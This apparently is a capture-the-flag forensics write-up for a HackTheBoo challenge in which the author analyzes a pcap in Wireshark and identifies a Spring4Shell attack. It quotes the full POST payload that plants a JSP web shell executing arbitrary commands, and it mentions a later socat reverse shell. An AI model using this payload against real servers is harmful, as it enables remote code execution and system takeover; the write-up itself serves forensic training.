“I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.” Now there is an internal breach in the Spooky Network and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did.
Difficulty: Easy
Let's check file
┌──(kali㉿kali)-[~/Desktop/HackTheBoo/Wrong-Spooky-Season]
└─$ file forensics_wrong_spooky_season.zip
forensics_wrong_spooky_season.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(kali㉿kali)-[~/Desktop/HackTheBoo/Wrong-Spooky-Season]
└─$ unzip forensics_wrong_spooky_season.zip
Archive: forensics_wrong_spooky_season.zip
inflating: capture.pcap
┌──(kali㉿kali)-[~/Desktop/HackTheBoo/Wrong-Spooky-Season]
└─$ file capture.pcap
capture.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)
We have pcap file!
Use Wireshark open it.
We have a lot of TCP and HTTP protocol. Let's check it
Filter HTTP, We can see ip.src = 192.168.1.180(Attacker) sent a POST request
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{prefix}i java.io.InputStream in = %{c}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=e4d1c32a56ca15b3&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
Check google I know it is a Spring4Shell
In this packet, Hacker is installing socat in the victim system and use reverse shell
